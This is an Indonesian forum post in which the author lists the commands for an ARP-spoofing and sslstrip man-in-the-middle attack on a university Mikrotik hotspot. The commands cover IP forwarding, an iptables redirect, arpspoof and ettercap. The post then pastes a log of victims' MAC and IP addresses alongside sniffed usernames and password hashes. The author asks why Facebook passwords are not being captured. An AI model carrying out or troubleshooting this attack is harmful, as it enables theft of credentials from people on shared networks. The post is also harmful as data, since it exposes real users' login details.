10-08-2011, 09:03 PM
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sslstrip -a
arpspoof -i wlan0 ip_gateway
ettercap -T -q -i wlan0 -M arp:remote // //
kalo masalah ane gini,,
ane sniff di mikrotik,, jadi karena di redirect ke port 10000 tuh user cuma muter2 login mikrotik,,
jadi yang ane dapat cuma mac adrres victim,user n pass nya,,cus dt4 ane mesti daftarin macaddr dulu,,
jadi password fb n dkk g pernah dapet,,bijimana donk?? hasilnya kira2 ini
[spoiler]
DHCP: [00:15:AF:A1:C9:7F] DISCOVER
DHCP: [00:15:AF:A1:C9:7F] DISCOVER
DHCP: [00:15:AF:A1:C9:7F] DISCOVER
DHCP: [00:15:AF:A1:C9:7F] REQUEST 172.16.40.207
DHCP: [172.16.40.1] ACK : 0.0.0.0 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1
DHCP: [00:15:AF:A1:C9:7F] DISCOVER
DHCP: [00:15:AF:A1:C9:7F] REQUEST 172.16.40.207
DHCP: [00:15:AF:A1:C9:7F] DISCOVER
DHCP: [00:15:AF:A1:C9:7F] REQUEST 172.16.40.207
DHCP: [172.16.40.1] ACK : 0.0.0.0 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1
DHCP: [00:21:5C:0D:C8:8D] DISCOVER
DHCP: [00:21:5C:0D:C8:8D] REQUEST 172.16.40.195
DHCP: [68:A3:C41:F47] REQUEST 172.16.40.94
DHCP: [90:4C:E5:58:94:6E] REQUEST 172.16.40.75
DHCP: [90:4C:E5:58:94:6E] REQUEST 172.16.40.75
DHCP: [172.16.40.1] ACK : 172.16.40.75 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1
DHCP: [172.16.40.1] ACK : 172.16.40.75 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1
DHCP: [00:1920:79:3A] REQUEST 172.16.40.225
DHCP: [E4:EC:10:B9:1D:41] DISCOVER
DHCP: [E4:EC:10:B9:1D:41] REQUEST 172.16.40.135
DHCP: [90:4C:E5:58:94:6E] REQUEST 172.16.40.75
DHCP: [90:4C:E5:58:94:6E] REQUEST 172.16.40.75
DHCP: [172.16.40.1] ACK : 172.16.40.75 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1
DHCP: [172.16.40.1] ACK : 172.16.40.75 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1
HTTP : 172.16.40.1:80 -> USER: AJOANGGA PASS: 976a6db93beb8d78a06ec2ed63a04168 INFO: http://hotspot.***.ac.id/login
HTTP : 172.16.40.1:80 -> USER: AJOANGGA PASS: 976a6db93beb8d78a06ec2ed63a04168 INFO: /login
HTTP : 172.16.40.1:80 -> USER: frendy_johnnery PASS: c3c3c2a38cdceae7e61208721981a614 INFO: http://hotspot.***.ac.id/login?dst=http:...oo.com/con
DHCP: [00:21:5C:0D:C8:8D] REQUEST 172.16.40.195
HTTP : 172.16.40.1:80 -> USER: frendy_johnnery PASS: c3c3c2a38cdceae7e61208721981a614 INFO: /login
HTTP : 172.16.40.1:80 -> USER: AJOANGGA PASS: a7fcad4b5b67721b66755be39c9307b9 INFO: http://hotspot.***.ac.id/login
HTTP : 172.16.40.1:80 -> USER: AJOANGGA PASS: a7fcad4b5b67721b66755be39c9307b9 INFO: /login
HTTP : 172.16.40.1:80 -> USER: frendy_johnnery PASS: 6c26f6365379942ee1d9b1a6a55cf2e4 INFO: http://hotspot.***.ac.id/login
HTTP : 172.16.40.1:80 -> USER: frendy_johnnery PASS: 6c26f6365379942ee1d9b1a6a55cf2e4 INFO: /login
DHCP: [90:4C:E5:A3:66:01] DISCOVER
DHCP: [90:4C:E5:A3:66:01] REQUEST 172.16.40.163
HTTP : 172.16.40.1:80 -> USER: AJOANGGA PASS: 75c20b8e09d4bfb2163fb336d0184948 INFO: http://hotspot.***.ac.id/login?dst=http:...ebook.com/
HTTP : 172.16.40.1:80 -> USER: AJOANGGA PASS: 75c20b8e09d4bfb2163fb336d0184948 INFO: /login
DHCP: [00:22:68:A9:CC:58] DISCOVER
DHCP: [00:22:68:A9:CC:58] REQUEST 172.16.40.150
HTTP : 172.16.40.1:80 -> USER: AJOANGGA PASS: 75c20b8e09d4bfb2163fb336d0184948 INFO: http://hotspot.***.ac.id/login?dst=http:...ebook.com/
DHCP: [90:4C:E5:58:94:6E] REQUEST 172.16.40.75
DHCP: [90:4C:E5:58:94:6E] REQUEST 172.16.40.75
DHCP: [172.16.40.1] ACK : 172.16.40.75 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1
DHCP: [172.16.40.1] ACK : 172.16.40.75 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1
DHCP: [C4:17:FE:AB:21:09] REQUEST 172.16.40.203
DHCP: [90:4C:E5:58:94:6E] REQUEST 172.16.40.75
DHCP: [172.16.40.1] ACK : 172.16.40.75 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1
DHCP: [90:4C:E5:58:94:6E] REQUEST 172.16.40.75
DHCP: [172.16.40.1] ACK : 172.16.40.75 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1
DHCP: [E4:EC:10:B9:1D:41] DISCOVER
DHCP: [E4:EC:10:B9:1D:41] REQUEST 172.16.40.135
HTTP : 172.16.40.1:80 -> USER: frendy_johnnery PASS: 80e8c6efda5ea87f89c9835d9927b26f INFO: http://hotspot.***.ac.id/login
HTTP : 172.16.40.1:80 -> USER: frendy_johnnery PASS: 80e8c6efda5ea87f89c9835d9927b26f INFO: /login
DHCP: [68:A3:C41:F47] REQUEST 172.16.40.94
DHCP: [68:A3:C41:F47] REQUEST 172.16.40.94
DHCP: [90:4C:E5:A3:66:01] REQUEST 172.16.40.163
DHCP: [E0:B9:A5:17:8F:03] REQUEST 172.16.40.90
DHCP: [00:21:5C:0D:C8:8D] REQUEST 172.16.40.195
DHCP: [172.16.40.1] ACK : 0.0.0.0 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1
DHCP: [00:21:5C:0D:C8:8D] DISCOVER
DHCP: [00:21:5C:0D:C8:8D] DISCOVER
DHCP: [00:21:5C:0D:C8:8D] DISCOVER
[\spoiler]
itu beberapa user terulang karena mreka coba akses hotspot tapi g bisa keluar browsing karena pas mo browsing di direct ke port 10000,,jadi gimana ttuh??